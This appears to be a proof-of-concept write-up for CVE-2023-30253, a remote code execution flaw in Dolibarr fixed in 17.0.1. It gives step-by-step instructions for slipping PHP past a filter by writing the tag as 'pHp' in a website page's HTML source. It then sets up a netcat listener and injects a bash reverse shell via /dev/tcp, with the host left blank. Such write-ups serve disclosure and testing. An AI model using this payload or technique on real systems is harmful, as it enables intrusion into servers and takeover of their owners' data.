## **CVE-2023-30253**

CVE-2023-30253 is a security flaw in Dolibarr software that enables authenticated users to execute remote code by utilizing an uppercase manipulation technique in injected data.

## Impact

This vulnerability can lead to unauthorized remote code execution by malicious actors, posing a severe threat to the security and integrity of the affected systems.
The vulnerability has been fixed in Dolibarr 17.0.1.

## Reference




## **Proof of Concept**

Following POC shows how to get Reverse Shell manually.


After login as test user, we can create/modify website.

![Untitled (1).png](images/Untitled_(1).png)

First create a website, and then create a page.

![Untitled (2).png](images/Untitled_(2).png)


After creating website and page, click on binoculars icon, this will open our created page in new tab.

Now click on Edit HTML Source.

![Untitled (4).png](images/Untitled_(4).png)

Here we can try adding php code, but there is some kind of filter preventing us to write a php code.
This can be easily bypassed by changing the format of word php.

![Untitled (5).png](images/Untitled_(5).png)

After changing format of word php to pHp, we can see it is successfully saved.

![Untitled (6).png](images/Untitled_(6).png)

Going to the page, we can see our inserted php code is working.

Now to get reverse shell, lets set up netcat listener

![Untitled (7).png](images/Untitled_(7).png)

![Untitled (8).png](images/Untitled_(8).png)

Then add our reverse shell code `<?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/ 0>&1'"); ?>`

Now opening the website, gives us reverse shell

![Untitled (9).png](images/Untitled_(9).png)




We can use the python code to make it easier


Setup netcat listener.


Run the script and we should have a revershell.

Author of the script:ย [](